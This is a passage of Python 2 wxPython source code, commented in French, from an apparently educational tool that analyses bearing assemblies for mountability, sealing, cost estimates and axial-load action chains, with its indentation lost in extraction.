# dl += 1
c = 0
for p in ["G", "D"]:
            if p in analyse.obstacleBagueIsolee.keys():
tag = "BagueIsolee"+p
self.boutons[tag] = buttons.ThemedGenBitmapToggleButton(self, 100+c,
Images.Img_BoutonMont('BagueIsolee'),
style = wx.BORDER_NONE)
self.boutons[tag].SetInitialSize()
# self.SetBitmapLabel(Images.Img_BoutonMont(tag+self.rad))
self.AddBouton("2", self.boutons[tag], (2,c), (1,2), flag = wx.ALIGN_CENTRE)
self.boutons[tag].SetToolTipString(u"Cliquer pour visualiser la bague de roulement qui ne peut pas être démontée.")
self.Bind(wx.EVT_BUTTON, self.montrerBaguesIsolee, self.boutons[tag])
c += 2
self.gererActivationBoutons()
self.SetSizerAndFit(self.sizer)
self.Thaw()
# ############################################################################
# def OnClick(self, event):
# id = event.GetId()
# if id in [10,11]:
# idOpp = "__Chaine"+ str(11-id)
# if self.boutons.has_key(idOpp):
# self.boutons[idOpp].SetToggle(False)
# self.parent.animerElemNonArretes(id-10)
# elif id in [20,21]:
# self.parent.gererAffichageChaines(event)
# elif id in [30,31]:
# self.parent.gererSurBrillanceArrets(event, id-30)
def EvtCheckBox(self, event):
# print self.analyse.demonterRltSerres, "-->", event.IsChecked()
self.analyse.analyserMontabilite(event.IsChecked(), self.parent.zoneMtg)
self.parent.ReplacePage(2)
def initAffichage(self, zoneMtg):
# print "Init affichage ZoneMont"
self.initAffichageSurbrillance()
self.analyse.elemDemonte = []
        # Put everything back together instantly
for i in zoneMtg.lstItemMtg:
if hasattr(i,"x"):
i.pos = (i.x,i.pos[1])
i.normale()
self.initEtatBoutons()
self.gererActivationBoutons()
zoneMtg.Redessiner(self.analyse)
def initEtatBoutons(self):
for b in self.boutons.values():
b.SetToggle(False)
def initAffichageSurbrillance(self):
for b in self.boutons.values():
if isinstance(b, BoutonMontage) and b.typeAction == 'obstacle':
b.Actionner(False)
self.Refresh()
self.Update()
#############################################################################
def gererActivationBoutons(self):
""" Change l'état normal des boutons d'animation de la montabilité """
# print
# print "Gestion Activation Boutons", self.analyse.elemDemonte,self.boutons["AnimEnsb1"].GetValue()
# if self.parent.master.options.proposerAnimMont.get() == 0:
# return
### Boutons "Ensemble"
if "AnimEnsb0" in self.analyse.elemDemonte or self.boutons["AnimEnsb0"].GetValue():
self.boutons["AnimEnsb1"].Active(False)
elif "AnimEnsb1" in self.analyse.elemDemonte or self.boutons["AnimEnsb1"].GetValue():
self.boutons["AnimEnsb0"].Active(False)
else:
self.boutons["AnimEnsb0"].Active(True)
self.boutons["AnimEnsb1"].Active(True)
### Boutons "Roulements"
if "AnimEnsb0" in self.analyse.elemDemonte \
or "AnimEnsb1" in self.analyse.elemDemonte:
etat = True
else:
etat = False
for t in self.boutons.keys():#["AnimRltG0","AnimRltG1","AnimRltD0","AnimRltD1"]:
if t[:7] == "AnimRlt":
self.boutons[t].Active(etat)
elif t[:-1] == "BagueIsolee":
self.boutons[t].Enable(not etat)
###
for p in ["G","D"]:
if "AnimRlt"+p+"0" in self.analyse.elemDemonte:
self.boutons["AnimRlt"+p+"1"].Active(False)
if "AnimRlt"+p+"1" in self.analyse.elemDemonte:
self.boutons["AnimRlt"+p+"0"].Active(False)
self.Layout()
self.Refresh()
self.Update()
# self.UpdateWindowUI()
# #############################################################################
# def activerDesactiverBoutons_Montage(self):
# """ Activation ou Désactivation des boutons lors d'un démontage """
#
# if self.master.analyse.elemDemonte == []:
# state = 'normal'
# else:
# state = 'disabled'
#
# for b in self.boutons.keys():
# if b[:4] <> "Anim":
# if state == 'normal':
# e = state
# else:
# e = state
# self.boutons[b].activerDesactiver(state)
# self.boutons[b].changerBulle()
#
# self.appliquerActivationDesactivation()
#
# #############################################################################
# def appliquerActivationDesactivation(self):
# for clef in self.boutons:
# if self.boutons[clef].type == 'demonte':
# self.boutons[clef]["state"] = self.etatBoutons[clef]
# ###########################################################################
# def montrerCollision(self, num):
# self.analyse.montrerCollision(n)
###########################################################################
def montrerBaguesIsolee(self, event):
if event.GetId() == 100:
p = "G"
else:
p = "D"
# print "Bagues isolées", self.analyse.obstacleBagueIsolee[p]
self.parent.montrerBagueIsolee(self.analyse.obstacleBagueIsolee[p],
self.boutons["BagueIsolee"+p].GetValue())
#####################################################
# Sealing ###########################################
#####################################################
class ZoneEtancheite(ZoneResultats):
def __init__(self, parent, analyse):
ZoneResultats.__init__(self, parent, analyse, liaison = False)
self.Freeze()
        # Static sealing
#####################################################
self.MakeStaticBox("1", u"Etanchéité statique")
        # Main result
message = analyse.resultatEtancheite["SB"]
self.Add("1", self.StaticTextMessage(message))
if "SB+" in analyse.resultatEtancheite.keys():
for mess in analyse.resultatEtancheite["SB+"]:
self.Add("1", self.StaticTextMessage(mess, style = 'Message'))
        # Per-seal results
self.MakeBoutonSizer("1",5,5)
StyleText["Titre2"].applique(self)
table = Tableau(self)
table.SetColLabelValue(0, u"Coté\ngauche")
table.SetColLabelValue(1, u"Coté\ndroit")
table.SetRowLabelValue(0, u"Sur Arbre")
table.SetRowLabelValue(1, u"Sur Alésage")
l, c = 0, 0
for p in ["G","D"]:
l = 0
for r in ["Ar","Al"]:
if analyse.resultatEtancheite["S"][p][r]:
table.SetCellValue(l,c, "X")
table.SetCellTextColour(l,c, Couleur["rouge"])
else:
table.SetCellValue(l,c, "Ok")
table.SetCellTextColour(l,c, Couleur["vert"])
l += 1
c += 1
table.Fit()
table.ForceRefresh()
self.AddBouton("1", table, (0,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
self.tableStat = table
        # Dynamic sealing
########################################################################
self.MakeStaticBox("2", u"Etanchéité dynamique")
if "DB" in analyse.resultatEtancheite:
            # Main result
message = analyse.resultatEtancheite["DB"]
self.Add("2", self.StaticTextMessage(message))
if "DB+" in analyse.resultatEtancheite.keys():
for mess in analyse.resultatEtancheite["DB+"]:
self.Add("2", self.StaticTextMessage(mess, style = 'Message'))
table = Tableau(self)
table.SetColLabelValue(0, u"Coté\ngauche")
table.SetColLabelValue(1, u"Coté\ndroit")
table.SetRowLabelValue(0, u"Vitesse")
table.SetRowLabelValue(1, u"Facteur PV")
            # Per-seal result
self.MakeBoutonSizer("2",5,5)
l, c = 0, 0
for p in ["G","D"]:
l = 0
for r in ["P","PV"]:
if analyse.resultatEtancheite["D"][p][r]:
table.SetCellValue(l,c, "X")
table.SetCellTextColour(l,c, Couleur["rouge"])
else:
table.SetCellValue(l,c, "Ok")
table.SetCellTextColour(l,c, Couleur["vert"])
l += 1
c += 1
table.Fit()
table.ForceRefresh()
self.AddBouton("2", table, (0,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
self.tableDyn = table
# self.MakeBoutonSizer("2",5,5)
# StyleText["Titre2"].applique(self)
# self.AddBouton("2", wx.StaticText(self, -1,u"Coté",style = wx.ALIGN_CENTRE), (0,1), (1,2), wx.ALIGN_CENTRE|wx.EXPAND)
# if not analyse.resultatEtancheite["J"]["G"]["Ar"]:
# self.AddBouton("2", wx.StaticText(self, -1,"gauche",style = wx.ALIGN_CENTRE), (1,1), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# if not analyse.resultatEtancheite["J"]["D"]["Ar"]:
# self.AddBouton("2", wx.StaticText(self, -1,"droit",style = wx.ALIGN_CENTRE), (1,2), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# if not (analyse.resultatEtancheite["J"]["D"]["Ar"] and analyse.resultatEtancheite["J"]["G"]["Ar"]):
# self.AddBouton("2", wx.StaticText(self, -1,"vitesse",style = wx.ALIGN_RIGHT), (2,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# self.AddBouton("2", wx.StaticText(self, -1,"facteur PV",style = wx.ALIGN_RIGHT), (3,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
#
# c = 1
# l = 2
# for p in ["G","D"]:
# if not analyse.resultatEtancheite["J"][p]["Ar"]:
# for r in ["P","PV"]:
# if analyse.resultatEtancheite["D"][p][r]:
# StyleText["Messag"].applique(self, Couleur["rouge"])
# txt = wx.StaticText(self, -1, "X",
# style = wx.ALIGN_CENTRE)
# else:
# StyleText["Messag"].applique(self, Couleur["vert"])
# txt = wx.StaticText(self, -1, "Ok",
# style = wx.ALIGN_CENTRE)
# self.AddBouton("2", txt, (l,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# l += 1
# c += 1
# l = 2
else:
pass
        # Lubricant compatibility
########################################################################
self.MakeStaticBox("3", u"Compatibilité lubrifiant")
message = analyse.resultatEtancheite["C"]
self.Add("3", self.StaticTextMessage(message))
self.SetSizerAndFit(self.sizer)
self.Thaw()
def initAffichage(self, zmont = None):
for b in self.boutons.values():
if isinstance(b, buttons.ThemedGenBitmapToggleButton):
self.OnClick(id = b.GetId(), act = False)
b.SetToggle(False)
#############################################################################
def lstNom(self,sens):
message = self.parent.analyse.resultatEffortAxialMtg[sens][1].mess
lst = []
pos = Montage.PositionDansPivot()
for res in self.parent.analyse.lstElemResistePas[sens]:
lst.append(pos.traduireEnTexte(res))
return {'mess' : message, 'lst' : lst}
# def OnSize(self, event = None):
# print "Resize ZoneResistance",
# print self.GetClientSizeTuple(),
# print self.GetSize()
## print self.GetClientSizeTuple()[0]
## for txt in [self.txt1,self.txt2]:
## txt.SetLabel(txt.GetLabel().replace('\n',' '))
## txt.Wrap(self.GetClientSizeTuple()[0])
# self.Fit()
# event.Skip()
def OnClick(self, event = None, id = None, act = None):
if id is None: id = event.GetId()
if id in [10,11]:
idOpp = "__Chaine"+ str(11-id)
if self.boutons.has_key(idOpp):
self.boutons[idOpp].SetToggle(False)
self.OnClick(id = 41-id, act = False)
self.parent.animerElemNonArretes(id-10)
elif id in [20,21]:
if act is None: act = event.GetIsDown()
self.parent.gererAffichageChaines(id-20, act)
elif id in [30,31]:
if act is None: act = event.GetIsDown()
self.parent.gererSurBrillanceArrets(id-30, act)
self.listeActive[id-30].Montrer(act)
self.Layout()
self.Update()
#####################################################
# Cost estimate #####################
#####################################################
class ZoneDevis(ZoneResultats):
def __init__(self, parent, analyse):
# print "Zone ImmobAx"
        ZoneResultats.__init__(self, parent, analyse, liaison = False)
# style=wx.NO_FULL_REPAINT_ON_RESIZE)
# print analyse.chaineAct[0]
if analyse.montageVide:
return
self.Freeze()
self.labels = {}
self.MakeStaticBox("1", u"Devis du montage")
        # Main result
#####################
# p = wx.Panel(self, -1)
self.lstElem = {}
self.devis = gridlib.Grid(self, -1, style = wx.NO_BORDER)
self.devis.CreateGrid(0, 2)
devisMtg = self.parent.mtgComplet.mtg.devis
# print devisMtg
self.devis.SetColLabelValue(0,u'Element')
self.devis.SetColLabelValue(1,u'Coût')
self.devis.SetLabelFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
# self.devis.SetLabelBackgroundColour(wx.WHITE)
self.devis.SetColLabelAlignment(wx.ALIGN_LEFT, wx.ALIGN_CENTRE)
self.devis.SetRowLabelAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)
self.devis.SetRowLabelSize(1)
self.devis.SetDefaultCellFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False))
self.devis.SetDefaultCellTextColour(wx.BLACK)
attrS = gridlib.GridCellAttr()
attrS.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, True))
attrS.SetTextColour(wx.BLUE)
attrS.SetReadOnly(True)
attrN = gridlib.GridCellAttr()
attrN.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False))
attrN.SetTextColour(wx.BLACK)
attrN.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)
attrN.SetReadOnly(True)
attrC = gridlib.GridCellAttr()
attrC.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
attrC.SetTextColour(wx.BLACK)
attrC.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTER)
attrC.SetReadOnly(True)
self.devis.AppendRows()
self.devis.SetRowAttr(0, attrS)
self.devis.SetCellValue(0, 0, u"Roulements")
self.devis.SetCellValue(0, 1, u" ")
i = 1
for l in devisMtg[0:2]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, l[0].nom)
self.devis.SetCellValue(i, 1, str(l[1]))
self.lstElem[i] = l[0].pos
i += 1
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrS)
self.devis.SetCellValue(i, 0, u"Arrets axiaux")
self.devis.SetCellValue(i, 1, u" ")
i += 1
for l in devisMtg[2:10]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, l[0].nom)
self.devis.SetCellValue(i, 1, str(l[1]))
self.lstElem[i] = l[0].pos
i += 1
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrS)
self.devis.SetCellValue(i, 0, u"Etanchéité")
self.devis.SetCellValue(i, 1, u" ")
i += 1
for l in devisMtg[10:14]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, l[0].nom)
self.devis.SetCellValue(i, 1, str(l[1]))
self.lstElem[i] = l[0].pos
i += 1
for l in devisMtg[14:]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, u"Chapeau support "+Const.cote2text[l[0]])
self.devis.SetCellValue(i, 1, str(l[1]))
i += 1
attrS.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
attrS.SetTextColour(wx.BLUE)
self.devis.SetColAttr(1, attrC)
self.devis.AppendRows()
self.devis.SetCellValue(i, 0, u"TOTAL")
self.devis.SetCellFont(i, 1, wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
self.devis.SetCellFont(i, 0, wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
self.devis.SetCellValue(i, 1, str(self.parent.mtgComplet.mtg.cout))
if self.parent.mtgComplet.CdCF.coutMax.get() < self.parent.mtgComplet.mtg.cout:
col = wx.RED
else:
col = wx.GREEN
self.devis.SetCellBackgroundColour(i, 1, col)
for r in range(self.devis.GetNumberRows()):
self.devis.SetRowLabelValue(r, " ")
self.devis.AutoSizeColumns()
self.devis.AutoSizeRows()
self.devis.Bind(gridlib.EVT_GRID_CELL_LEFT_CLICK, self.OnCellLeftClick)
self.Add("1", self.devis, flag = wx.ALIGN_CENTRE)
# print self.devis.GetSize()
self.devis.Fit()
self.devis.ForceRefresh()
self.SetSizerAndFit(self.sizer)
# p.SetSize(self.devis.GetSize())
# self.statBox[id].SetClientSize(p.GetSize())
self.Thaw()
self.Refresh()
def OnCellLeftClick(self, event):
r = event.GetRow()
        if r in self.lstElem:
self.parent.zoneMtg.surImage(self.lstElem[r])
else:
self.parent.zoneMtg.surImage()
event.Skip()
def initAffichage(self, zmont = None):
self.parent.zoneMtg.surImage()
class Tableau(gridlib.Grid):
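    """Small 2x2 read-only grid with centred cells and white label background
    (role inferred from its styling: a base for simple result tables)."""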
def __init__(self, parent):
gridlib.Grid.__init__(self, parent, -1, style = wx.NO_BORDER)
self.CreateGrid(2,2)
attrS = gridlib.GridCellAttr()
attrS.SetReadOnly(True)
self.SetDefaultCellAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)
self.SetLabelBackgroundColour(wx.WHITE)
self.SetLabelFont(StyleText["Normal"].font)
self.SetDefaultCellFont(StyleText["Messag"].font)
self.SetRowAttr(0, attrS)
self.SetRowAttr(1, attrS)
self.AutoSizeRows()
##############################################################################
##############################################################################
#
#                              Analysis window                               #
#
##############################################################################
##############################################################################
class TBAnalyse(wx.Treebook):
def __init__(self, parent, mtgComplet, zMont, analyse, nbCdCF):
# print "INSTANCIATION TBAnalyse"
wx.BeginBusyCursor(wx.HOURGLASS_CURSOR)
wx.Treebook.__init__(self, parent, -1,
style = wx.NB_TOP|wx.BORDER_NONE|wx.TR_HAS_BUTTONS)
self.dicTypeAnalyse = ([u"Structure du Montage", ZoneImmobAx, Icones.Icon_AnalysArret.GetBitmap()],
[u"Résistance aux Charges", ZoneResistance, Icones.Icon_AnalysEffort.GetBitmap()],
[u"Montabilité des Eléments", ZoneMontabilite, Icones.Icon_AnalysMonta.GetBitmap()],
[u"Etanchéité du montage", ZoneEtancheite, Icones.Icon_AnalysEtanch.GetBitmap()],
[u"Devis : coût indicatif", ZoneDevis, Icones.Icon_AnalysDevis.GetBitmap()])
self.parent = parent
self.nbCdCF = nbCdCF
self.Freeze()
self.InitialiserAnalyse(mtgComplet, zMont, analyse)
# print self.analyse
self.img = []
il = wx.ImageList(30, 30)
for p in self.dicTypeAnalyse:
self.img.append(il.Add(p[2]))
self.AssignImageList(il)
for p in range(len(self.dicTypeAnalyse)):
self.InitPage(p)
self.ExpandNode(0)
# # This is a workaround for a sizing bug on Mac...
# wx.FutureCall(100, self.AdjustSize)
self.Bind(wx.EVT_TREEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_TREEBOOK_PAGE_CHANGING, self.OnPageChanging)
self.Thaw()
wx.EndBusyCursor()
# print "FIN INSTANCIATION TBAnalyse"
def InitialiserAnalyse(self, mtgComplet, zoneMtg, analyse):
self.zoneMtg = zoneMtg
self.mtgComplet = mtgComplet
self.analyse = analyse
self.analyse.elemDemonte = []
if self.analyse.estPerimee:
self.analyse.lancerAnalyse(mtgComplet, zoneMtg)
def InitPage(self, num):
fam = self.dicTypeAnalyse[num]
page = fam[1](self, self.analyse)
self.InsertPage(num, page, fam[0], imageId = self.img[num])
# page.Layout()
def ReplacePage(self, num):
self.Freeze()
sel = self.GetSelection()
self.GetPage(num).initAffichage(self.zoneMtg)
self.InitPage(num)
self.DeletePage(num+1)
self.Layout()
self.ChangeSelection(sel)
self.Thaw()
def OnPageChanging(self, event):
self.analyse.initTraceResultats(self.zoneMtg)
        try:
            self.GetCurrentPage().initAffichage(self.zoneMtg)
        except: pass  # not every page implements initAffichage
        self.zoneMtg.Redessiner(self.analyse)
        event.Skip()
def OnPageChanged(self, event = None):
# print "Page changed"
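        # Page indices follow dicTypeAnalyse: 0 structure, 1 load resistance,
        # 2 mountability, 3 sealing, 4 cost estimate. The nbCdCF tab numbers
        # below are assumed to select the matching CdCF pages.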
if self.GetSelection() == 3:
self.nbCdCF.nb.ChangeSelection(2)
elif self.GetSelection() == 1:
self.nbCdCF.nb.ChangeSelection(0)
def AdjustSize(self):
self.GetTreeCtrl().InvalidateBestSize()
self.SendSizeEvent()
#############################################################################
def animerElemNonArretes(self, sens):
        # Erase the opposite-direction chain if needed ...
        sensOpp = 1-sens
        chopp = self.analyse.chaineTracee[sensOpp]
        if chopp is not None:
            effchopp = True
            self.analyse.chaineTracee[sensOpp] = None
            self.zoneMtg.Redessiner(self.analyse)
        else:
            effchopp = False
        # Run the animation
        self.analyse.animerManqueArret(self.zoneMtg, sens)
        # Redraw the opposite chain if needed ...
        if effchopp:
            self.analyse.chaineTracee[sensOpp] = True
            self.zoneMtg.Redessiner(self.analyse)
def surbrillanceMobiles(self, sens, active):
self.GetCurrentPage().gererActivationBoutons()
self.analyse.tracerSurBrillanceMobiles(self.zoneMtg, sens ,active)
#############################################################################
def montrerCollision(self, lstObs, palier = None, action = True, surBrill = False):
self.analyse.montrerCollision(self.zoneMtg, lstObs, palier, action, surBrill)
def montrerBagueIsolee(self, lstCode, active):
self.analyse.montrerCollision(self.zoneMtg, lstCode,
active = active)
#############################################################################
def animerMontage(self, tag, remonter):
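        # Note on the tag format (inferred from the slicing in this method,
        # not from a documented spec): tag[4] is the element kind ('R' for a
        # bearing, 'E' for the shaft assembly), tag[7] the side ('G'/'D'),
        # tag[8] the direction ('0'/'1').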
def collision(tag, tagOpp, remonter):
            # Case where the mount/dismount on the opposite seat is already done ...
            if remonter != (tagOpp in self.analyse.elemDemonte):
                return False
            # Collision analysis
if remonter:
if (tag[8] == "0" and tag[7] == "D") \
or (tag[8] == "1" and tag[7] == "G"):
return True
else:
if (tag[8] == "0" and tag[7] == "G") \
or (tag[8] == "1" and tag[7] == "D"):
return True
return False
self.operationMontage = True
lstBoutons = self.GetPage(2).boutons
if tag[4] == "R":
if self.mtgComplet.mtg.palier[tag[7]].rlt.num is None:
return
if tag[7] == "G":
tagOpp = tag[0:7] + "D" + tag[8]
elif tag[7] == "D":
tagOpp = tag[0:7] + "G" + tag[8]
if tagOpp in lstBoutons and collision(tag, tagOpp, remonter):
lstBoutons[tagOpp].Actionner(not remonter)
if tag[4] == "E" and remonter:
## print " ... déja démontés = ",self.analyse.elemDemonte
while len(self.analyse.elemDemonte) > 1:
t = self.analyse.elemDemonte[1]
if t[4] == "R":
## self.master.boutons[t].animerMontage(t,remonter)
lstBoutons[t].Actionner(not remonter)
if remonter:
self.analyse.animerMontageDemontage(self.zoneMtg, tag ,remonter)
if tag in self.analyse.elemDemonte:
self.analyse.elemDemonte.remove(tag)
# self.bulle.changer(self.listeBulle(not remonter))
else:
self.analyse.elemDemonte.append(tag)
# self.bulle.changer(self.listeBulle(not remonter))
self.analyse.animerMontageDemontage(self.zoneMtg, tag ,remonter)
self.GetCurrentPage().gererActivationBoutons()
#############################################################################
def gererAffichageChaines(self, sens, afficher):
# id = event.GetId()
# print "Gestion affichage chaine",sens,":",afficher
if afficher:
            self.analyse.SetTracerChaine(sens, True)
else:
self.analyse.SetTracerChaine(sens, None)
# print self.analyse.chaineTracee
self.zoneMtg.Redessiner(self.analyse)
###############################################################################
def gererSurBrillanceArrets(self, sens, action):
## print "SurBrillance arrets: sens",sens
### print self.lstElemResistePas[sens]
        if self.analyse.elemDemonte != []:
return
self.analyse.tracerSurbrillanceArrets(self.zoneMtg, sens, action)
self.gererAffichageChaines(sens, action)
# self.zoneMtg.InitBuffer()
################################################################################
################################################################################
class BoutonMontage(buttons.ThemedGenBitmapToggleButton):
def __init__(self, parent, tag,
typeAction, analyse,
lstObs):
if tag[:4] == "Anim":
if analyse.cdcf.bagueTournante == "I":
self.rad = "Ar"
else:
self.rad = "Al"
## sens = eval(img[8])
else:
self.rad = ""
self.typeAction = typeAction
self.parent = parent
self.analyse = analyse
self.lstObs = lstObs
self.tag = tag
if typeAction == 'demonte':
buttons.ThemedGenBitmapToggleButton.__init__(self, parent, -1,None, style = wx.BORDER_NONE)
self.SetBitmapLabel(Images.Img_BoutonMont(tag+self.rad))
self.SetBitmapSelected(Images.Img_BoutonMont(tag+self.rad+"R"))
self.SetInitialSize()
# self.SetSize(self.GetBestSize())
else:
buttons.ThemedGenBitmapToggleButton.__init__(self, parent, -1,
Images.Img_BoutonMont(tag+self.rad, True),
style = wx.BORDER_NONE)
self.appliquerBulle(False)
self.SetAutoLayout(True)
self.parent.Bind(wx.EVT_BUTTON, self.OnClick, self)
############################################################################
def Actionner(self, state):
""" Simule l'action d'un Click
... avec evenement ... """
# print self.tag,self.GetValue(), state
if self.GetValue() <> state:
self.SetToggle(state)
self.OnClick(state = state)
############################################################################
def OnClick(self, event = None, state = None):
wx.BeginBusyCursor(wx.HOURGLASS_CURSOR)
if state is None: state = event.GetIsDown()
if self.typeAction == 'demonte':
self.parent.initAffichageSurbrillance()
self.parent.parent.animerMontage(self.tag, not state)
self.appliquerBulle(state)
        elif self.tag[4] != "R":
            self.parent.parent.surbrillanceMobiles(int(self.tag[8]), state)
self.parent.parent.montrerCollision(self.lstObs,
palier = self.tag[7],
action = state, surBrill = False)
self.parent.Layout()
elif self.tag[4] == "R":# and self.GetValue():
# print "Obstacle Ensemble :",n, action
self.parent.parent.montrerCollision(self.lstObs,
palier = self.tag[7],
action = state, surBrill = True)
self.parent.Layout()
wx.EndBusyCursor()
############################################################################
def appliquerBulle(self, state):
def listeBulle(remonter = False):
b = []
if self.tag[4] == "R" \
and self.analyse.elemDemonte == []:
b.append('EnsPasDemont')
else:
b.append('vide')
if remonter:
b.append("Rem")
else:
b.append("Dem")
b.append(self.tag[4:7])
if self.tag[4] == "R":
b.append(self.tag[7])
else:
b.append(self.rad)
if remonter:
b.append("depuis")
else:
b.append("vers")
b.append("sens"+self.tag[8])
return b
if self.typeAction == 'demonte':
txt = ''
for c in listeBulle(state):
txt += Const.bulles[c]+" "
self.SetToolTipString(txt)
else:
self.SetToolTipString(Const.bulles['AnalyMtgObs'])
############################################################################
def lstNom(self,lstObstacles):
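        """Build the tooltip payload: a headline message plus a readable name
        for each obstacle in <lstObstacles> (summary inferred from the code)."""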
if type(lstObstacles) == list:
if type(lstObstacles[0]) == str:
self.label = 'simple'
message = Const.MessageAnalyse('CollisionRlt').mess
else:
self.label = 'double'
message = Const.MessageAnalyse('Collision').mess
else:
self.label = 'bague'
if len(lstObstacles.keys()) == 1:
message = Const.MessageAnalyse('BagueIsolee').mess
else:
message = Const.MessageAnalyse('BaguesIsolees').mess
pos = Montage.PositionDansPivot()
lst = []
for i in lstObstacles:
strObstacles = ''
if self.label == 'double':
strObstacles += pos.traduireEnTexte(i[0]) + "\n" + pos.traduireEnTexte(i[1])
elif self.label == 'simple':
strObstacles += pos.traduireEnTexte(i)
elif self.label == 'bague':
strObstacles += Const.cote2text[i]
lst.append(strObstacles)
# print lst[0].encode('cp437','replace')
return {'mess' : message, 'lst' : lst}
##########################################################################################
def montrerCacherElem(self, num, act = True):
deuxCoul = True
if self.label == 'double':
lstElem = self.lstObs[num]
elif self.label == 'simple':
lstElem = [self.lstObs[num]]
elif self.label == 'bague':
deuxCoul = False
lstElem = self.lstObs[num]
self.analyse.montrerArrets(lstCode = lstElem, palier = self.tag[7], active = act,
deuxCouleurs = deuxCoul)
############################################################################
def Active(self, etat):
""" Active (ou désactive) le bouton
"""
# if state == 'normal':
# etat = self.type
# else:
# etat = state
if etat : self.Enable()
else: self.Disable()
##############################################################################
##############################################################################
#
#                  Action chains in direction <sens>                         #
#
##############################################################################
##############################################################################
class ChainesAction:
def __init__(self, sens):
        self.sens = sens
        # Indices of the valid paths
        self.valid = []
        # List of the paths
        self.parcoursElemEntr = [[]]
        # One list of polylines per direction ...
        self.lstLignes = []
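        # Data layout: <parcoursElemEntr> is a list of paths, each path a list
        # of PositionDansPivot links; <valid> stores the indices of the paths
        # that end on a load-carrying arrest (filled in determiner() below).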
#############################################################################
def determiner(self, mtg, zoneMtg, serrage = False):
        # Reset valid/parcoursElemEntr/lstLignes before a fresh pass
        self.__init__(self.sens)
if self.sens == 0:
cote = "G"
coteOpp = "D"
else:
cote = "D"
coteOpp = "G"
        # Analysis from the far end of the assembly:
        #----------------------------------------
pos = Montage.PositionDansPivot(typelem = "A",
radiale = "Ar",
cotelem = cote,
palier = cote)
self.maillonElemEntraines(mtg,pos,0)
        # Analysis from the middle of the assembly:
        #--------------------------------------
pos = Montage.PositionDansPivot(typelem = "A",
radiale = "Ar",
cotelem = cote,
palier = coteOpp)
self.parcoursElemEntr.append([])
self.maillonElemEntraines(mtg,pos,len(self.parcoursElemEntr)-1)
        # Analysis from the end-side bearing:
        #----------------------------------------
if serrage:
pos = Montage.PositionDansPivot(typelem = "R",
radiale = "Ar",
cotelem = cote,
palier = cote)
self.parcoursElemEntr.append([])
self.maillonElemEntraines(mtg,pos,len(self.parcoursElemEntr)-1)
        # Analysis from the middle-side bearing:
        #-------------------------------------
if serrage:
pos = Montage.PositionDansPivot(typelem = "R",
radiale = "Ar",
cotelem = cote,
palier = coteOpp)
self.parcoursElemEntr.append([])
self.maillonElemEntraines(mtg,pos,len(self.parcoursElemEntr)-1)
        # Analyze the collected paths:
        #-----------------------
for i in range(len(self.parcoursElemEntr)):
par = self.parcoursElemEntr[i]
if len(par) > 0:
                pos = par[-1]
## print mtg.elemPos(pos)
if pos.radiale == "Al" \
and mtg.elemPos(pos).supporteEffortAxial(self.sens,pos) \
and pos.typelem == "A":
self.valid.append(i)
        # Determine the chain polylines:
        #---------------------------
self.determinerLignes(mtg, zoneMtg, self.sens)
# print "Parcours :\n",self.parcoursElemEntr
# print "Valides :\n",self.valid
##########################################################################
def ajouterMaillonElemEntre(self, pos, num):
        lp = pos.copie()
        self.parcoursElemEntr[num].append(lp)
##########################################################################
def nouveauParcours(self, num, dernPos = None):
"Crée un nouveau parcours à partir du parcour <num> et retourne son numéro"
# On crée le nouveau parcours ...
self.parcoursElemEntr.append([])
numSuiv = len(self.parcoursElemEntr)-1
## print "dernpos",dernPos
# On copie le parcours dans le parcours suivant ...
for p in self.parcoursElemEntr[num]:
## print "copie",p
self.ajouterMaillonElemEntre(p, numSuiv)
if p.egal(dernPos):
## print "fin"
return numSuiv
return numSuiv
#########################################################################
def maillonElemEntraines(self,mtg,pos,num):
""" Renvoie un maillon "actif" d'une chaine d'action
"""
        if pos is None:
return False
else:
maillon = mtg.elemPos(pos)
maillonOpp = mtg.elemPos(pos.opposee())
            # Bail out if the very first link is a spacer (entretoise)
            if ( maillon.estEntretoise() \
            or (maillon.num is None and maillonOpp.estEntretoise())) \
            and len(self.parcoursElemEntr[num]) == 0:
                return False
            ### If the element is a spacer (entretoise)
            if maillon.estEntretoise() or maillonOpp.estEntretoise():
                # Add the spacer, splitting the path if needed
                if not maillon.estEntretoise() and pos.radiale == "Al":
                    # Double contact spacer / shoulder
                    numSuiv = self.nouveauParcours(num)
                    self.ajouterMaillonElemEntre(pos.opposee(),numSuiv)
                else:
                    numSuiv = num
                self.ajouterMaillonElemEntre(pos,numSuiv)
                # Also add the next bearing if the spacer sits on the bore
                if pos.radiale == "Al":
                    self.ajouterMaillonElemEntre(pos.suivant("RoultSuiv",self.sens),numSuiv)
                # Continue through the spacer ...
                if not self.maillonElemEntraines(mtg,pos.suivant("SauteEntre",self.sens),numSuiv):
                    if num == numSuiv:
                        return False
                if num == numSuiv:
                    return True
